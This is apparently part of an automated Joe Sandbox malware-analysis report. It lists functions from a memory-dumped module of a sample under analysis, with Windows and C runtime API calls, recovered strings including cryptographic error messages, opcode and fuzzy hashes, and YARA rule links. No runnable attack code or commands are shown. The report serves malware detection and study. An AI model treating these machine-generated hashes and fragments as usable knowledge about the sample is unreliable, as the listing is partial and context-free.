                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          • _memmove.LIBCMT ref: 6F0240C8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                                          • String ID: invalid string position$string too long
                                                                                                          • API String ID: 1615890066-4289949731
                                                                                                          • Opcode ID: abca67152dd3f5160a2e83f60b587ec130a335396c1f94eef359ad47cf69da03
                                                                                                          • Instruction ID: 2e3979ff3d1582c8d2a226448e09a08fa207b375b0e9d7747037ec58519c0e62
                                                                                                          • Opcode Fuzzy Hash: abca67152dd3f5160a2e83f60b587ec130a335396c1f94eef359ad47cf69da03
                                                                                                          • Instruction Fuzzy Hash: 4931B636304210ABD7219F5CECC0B5AF7E9FB95665F200A2FE551CB282D77298808BB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F038470 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • InitializeCriticalSection.KERNEL32(00000000,00000000,6F035D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6F0384EA
                                                                                                          • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6F0384F0
                                                                                                          • std::exception::exception.LIBCMT ref: 6F03853C
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F038551
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalInitializeSection$Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 3005353045-2241063504
                                                                                                          • Opcode ID: 6745b48727b7dced2098d68a214cc69cb2ee68fec9be3a32a68c91a637fa4eec
                                                                                                          • Instruction ID: d35a847137812424b6486780c1e5b44324862782a9c18a547c57d645ac91475f
                                                                                                          • Opcode Fuzzy Hash: 6745b48727b7dced2098d68a214cc69cb2ee68fec9be3a32a68c91a637fa4eec
                                                                                                          • Instruction Fuzzy Hash: 2B316A76905704AFCB14CF68C980A9AFBF4FF09210F508A6EE81687B41D771F604CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F08C23B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ___BuildCatchObject.LIBCMT ref: 6F08C24E
                                                                                                            • Part of subcall function 6F08C1A9: ___BuildCatchObjectHelper.LIBCMT ref: 6F08C1DF
                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 6F08C265
                                                                                                          • ___FrameUnwindToState.LIBCMT ref: 6F08C273
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                          • String ID: csm$csm
                                                                                                          • API String ID: 2163707966-3733052814
                                                                                                          • Opcode ID: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
                                                                                                          • Instruction ID: 22bc57bbb1689cb5b124b228f3bc0579e34e4db95f790759d1aed5a4e2f09439
                                                                                                          • Opcode Fuzzy Hash: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
                                                                                                          • Instruction Fuzzy Hash: 5301E471401209BBDF125F91CC45FEA7F6AEF08354F108120FD28162A0D736A9A2DBA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F062300 Relevance: 7.8, APIs: 5, Instructions: 257COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: 64c80e934b2bce2e103270238e4bda96db9704daae2882ea0cf1396b85d5b668
                                                                                                          • Instruction ID: 7ed63f87b64b501b948e294137dce1fb0bb8385f6f94882149423c571c8216f2
                                                                                                          • Opcode Fuzzy Hash: 64c80e934b2bce2e103270238e4bda96db9704daae2882ea0cf1396b85d5b668
                                                                                                          • Instruction Fuzzy Hash: 8E915B716087019FDB14DF68D980B6BB7E9FFC9644F104A2DE499C7780EB34E9058BA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05940F14 Relevance: 7.7, Strings: 6, Instructions: 201COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985194457.0000000005940000.00000040.00000800.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5940000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: HERE$HERE$LOOK$LOOK$p<{q$p<{q
                                                                                                          • API String ID: 0-1229034622
                                                                                                          • Opcode ID: 4377651d8e2ffe047fc4f4475334ec7728ed887c53735a3709920d12c9f1d693
                                                                                                          • Instruction ID: 205ba91702220cc869ca566503ed7ff1ac4488a0aff8cca6bfea4ee892250e85
                                                                                                          • Opcode Fuzzy Hash: 4377651d8e2ffe047fc4f4475334ec7728ed887c53735a3709920d12c9f1d693
                                                                                                          • Instruction Fuzzy Hash: 3DA18374E042298FDB68DF69C984BE9B7B2BB48310F1485E9D54DAB361DB309E81CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F051D50 Relevance: 7.6, APIs: 5, Instructions: 144timesleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Timetime$Sleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 4176159691-0
                                                                                                          • Opcode ID: a38f2fbcaf7a64a874b4bc6a48d5a530ca02eec4e5cc58735f89fd53724db015
                                                                                                          • Instruction ID: 9577ec0ca2a312fe00f73331060061c6ac6ae6c64039497b2e48a27570df10b8
                                                                                                          • Opcode Fuzzy Hash: a38f2fbcaf7a64a874b4bc6a48d5a530ca02eec4e5cc58735f89fd53724db015
                                                                                                          • Instruction Fuzzy Hash: ED51D1B1D042959FEB01DFA8CA8179DBFF8BB05314F1485AED448DB280D7B1A950DBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F037750 Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6F037761
                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,?), ref: 6F037782
                                                                                                          • EnterCriticalSection.KERNEL32(00000018), ref: 6F037796
                                                                                                          • LeaveCriticalSection.KERNEL32(00000018), ref: 6F0377CE
                                                                                                          • QueueUserWorkItem.KERNEL32(6F051D50,00000000,00000010), ref: 6F03780C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterLeave$ItemQueueUserWork
                                                                                                          • String ID:
                                                                                                          • API String ID: 584243675-0
                                                                                                          • Opcode ID: 570990af74a081dc9f35830ea55dbdda4f7a6f382e5a987ead8fb7fa4de2aea2
                                                                                                          • Instruction ID: 550cb8ab9c339ac6d09f3a53ab01d7794d82e4087ee048268e5227ff9496e21f
                                                                                                          • Opcode Fuzzy Hash: 570990af74a081dc9f35830ea55dbdda4f7a6f382e5a987ead8fb7fa4de2aea2
                                                                                                          • Instruction Fuzzy Hash: FD21AD3694470AEFCB10CF64C944F9BBBF8BB41310F00885AE85687650DB70F618DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F08F03B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 6F08F047
                                                                                                            • Part of subcall function 6F08EAE6: __getptd_noexit.LIBCMT ref: 6F08EAE9
                                                                                                            • Part of subcall function 6F08EAE6: __amsg_exit.LIBCMT ref: 6F08EAF6
                                                                                                          • __amsg_exit.LIBCMT ref: 6F08F067
                                                                                                          • __lock.LIBCMT ref: 6F08F077
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6F08F094
                                                                                                          • InterlockedIncrement.KERNEL32(05991608), ref: 6F08F0BF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 4271482742-0
                                                                                                          • Opcode ID: 444f7a1a1b5c37f279202ffd0c0ffafe02b18807321db57a9a8c98d1a06e0c16
                                                                                                          • Instruction ID: c9e56f0ef7705bd74a0acd6ed63b938ce649e202228093cf14e4247ce98694e6
                                                                                                          • Opcode Fuzzy Hash: 444f7a1a1b5c37f279202ffd0c0ffafe02b18807321db57a9a8c98d1a06e0c16
                                                                                                          • Instruction Fuzzy Hash: D0019231906B25AFDF11ABB48844B9E77A8BF05726F500146E834A72C4DB34B861DFD1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F08F7BC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 6F08F7C8
                                                                                                            • Part of subcall function 6F08EAE6: __getptd_noexit.LIBCMT ref: 6F08EAE9
                                                                                                            • Part of subcall function 6F08EAE6: __amsg_exit.LIBCMT ref: 6F08EAF6
                                                                                                          • __getptd.LIBCMT ref: 6F08F7DF
                                                                                                          • __amsg_exit.LIBCMT ref: 6F08F7ED
                                                                                                          • __lock.LIBCMT ref: 6F08F7FD
                                                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 6F08F811
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 938513278-0
                                                                                                          • Opcode ID: 5995fd01ca6752c1c1abe0a3e2890a9f98258dc8e0a5d7fec3df4e2775b01751
                                                                                                          • Instruction ID: dfbce398bcf1df32f0bd7cb704fde08dae55ab16cbd6741b39d55cf0308c82b0
                                                                                                          • Opcode Fuzzy Hash: 5995fd01ca6752c1c1abe0a3e2890a9f98258dc8e0a5d7fec3df4e2775b01751
                                                                                                          • Instruction Fuzzy Hash: 8DF0B4329457119BFF30ABB89401B4D73E4BF00729F20424AE830A71C0DF346540DA96
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F06E6E0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2001391462-3916222277
                                                                                                          • Opcode ID: 4fd9a7b9e35f7e9cb7d81c4b9982fb215aafb5a9743ef636b116a03165733784
                                                                                                          • Instruction ID: 186ba5a2587ae307c13663c24abf9f640c499fd6885bc29ecb9078f0072ef047
                                                                                                          • Opcode Fuzzy Hash: 4fd9a7b9e35f7e9cb7d81c4b9982fb215aafb5a9743ef636b116a03165733784
                                                                                                          • Instruction Fuzzy Hash: D7C18C756083028FD714CF28C984BAAB7E5FFC9314F044A2EE895C7254E775EA49CB46
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F088B60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 252COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memcpy_s_memmove_memset
                                                                                                          • String ID: EncodingParameters
                                                                                                          • API String ID: 4034675494-55378216
                                                                                                          • Opcode ID: 2c1b736e7e7a9a038cf833f941d26c1d91306159fb5b9468fbcb444e4669c879
                                                                                                          • Instruction ID: 8eefdb41bb016f628f4aa4a99ec80407a9418dc013237dec54bfd5f6ab7eba7b
                                                                                                          • Opcode Fuzzy Hash: 2c1b736e7e7a9a038cf833f941d26c1d91306159fb5b9468fbcb444e4669c879
                                                                                                          • Instruction Fuzzy Hash: 9591687460C3819FDB00CF28C880B5BBBE5AFDA708F14491DF9A987391D675E949CB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F061200 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 244COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F07D820: _memmove.LIBCMT ref: 6F07D930
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0613D4
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                            • Part of subcall function 6F058D80: _malloc.LIBCMT ref: 6F058D8A
                                                                                                            • Part of subcall function 6F058D80: _malloc.LIBCMT ref: 6F058DAF
                                                                                                          Strings
                                                                                                          • for this key, xrefs: 6F061348
                                                                                                          • doesn't match the required length of , xrefs: 6F061316
                                                                                                          • : ciphertext length of , xrefs: 6F0612E4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc$ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
                                                                                                          • String ID: doesn't match the required length of $ for this key$: ciphertext length of
                                                                                                          • API String ID: 1025790555-2559040249
                                                                                                          • Opcode ID: cc7e25b9e4c1f31aa900b326a95503aab1acec2a47e5bd36f250c6c2a360092b
                                                                                                          • Instruction ID: f4a05505e6aba445484363af09d8b6d448355fa50aefe8e60257482290fc5cd3
                                                                                                          • Opcode Fuzzy Hash: cc7e25b9e4c1f31aa900b326a95503aab1acec2a47e5bd36f250c6c2a360092b
                                                                                                          • Instruction Fuzzy Hash: 48A14E755083809FD324DB69D880B9BB7E9BFD9308F444A1DE59D83391EB70A904CBA3
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F08B47D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
